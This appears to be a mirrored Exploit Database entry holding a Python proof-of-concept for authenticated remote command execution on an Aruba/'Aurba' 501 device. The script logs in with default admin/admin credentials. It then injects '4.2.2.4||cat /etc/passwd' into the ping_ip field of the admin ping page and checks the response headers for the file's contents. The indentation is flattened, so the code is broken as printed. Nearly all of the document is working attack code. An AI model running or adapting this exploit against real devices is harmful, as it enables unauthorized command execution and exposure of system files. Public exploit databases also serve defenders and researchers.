Aurba 501 – Authenticated RCE

• Exploit Database
• 21 阅读

• 作者： Hosein Vita
  日期： 2024-08-24
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/52074/

• # Exploit Title: Remote Command Execution | Aurba 501
  # Date: 17-07-2024
  # Exploit Author: Hosein Vita
  # Vendor Homepage: https://www.hpe.com
  # Version: Aurba 501 CN12G5W0XX
  # Tested on: Linux
  
  import requests
  from requests.auth import HTTPBasicAuth
  
  
  def get_input(prompt, default_value):
  user_input = input(prompt)
  return user_input if user_input else default_value
  
  
  base_url = input("Enter the base URL: ")
  if not base_url:
  print("Base URL is required.")
  exit(1)
  
  username = get_input("Enter the username (default: admin): ", "admin")
  password = get_input("Enter the password (default: admin): ", "admin")
  
  
  login_url = f"{base_url}/login.cgi"
  login_payload = {
  "username": username,
  "password": password,
  "login": "Login"
  }
  
  
  login_headers = {
  "Accept-Encoding": "gzip, deflate, br",
  "Content-Type": "application/x-www-form-urlencoded",
  "Origin": base_url,
  "Connection": "close"
  }
  
  session = requests.Session()
  
  
  requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  
  # Login to the system
  response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)
  
  # Check if login was successful
  if response.status_code == 200 and "login failed" not in response.text.lower():
  print("Login successful!")
  
  # The command to be executed on the device
  command = "cat /etc/passwd"
  
  
  ping_ip = f"4.2.2.4||{command}"
  
  # Data to be sent in the POST request
  data = {
  "ping_ip": ping_ip,
  "ping_timeout": "1",
  "textareai": "",
  "ping_start": "Ping"
  }
  
  # Headers to be sent with the request
  headers = {
  "Accept-Encoding": "gzip, deflate, br",
  "Content-Type": "application/x-www-form-urlencoded",
  "Origin": base_url,
  "Referer": f"{base_url}/admin.cgi?action=ping",
  "Connection": "close"
  }
  
  # Sending the HTTP POST request to exploit the vulnerability
  exploit_url = f"{base_url}/admin.cgi?action=ping"
  response = session.post(exploit_url, headers=headers, data=data, verify=False)
  
  
  if any("root" in value for value in response.headers.values()):
  print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
  print(response.headers)
  else:
  print("Exploit failed. The response headers did not contain the expected output.")
  else:
  print("Login failed. Please check the credentials and try again.")
  
  # Print the response headers for further analysis
  print(response.headers)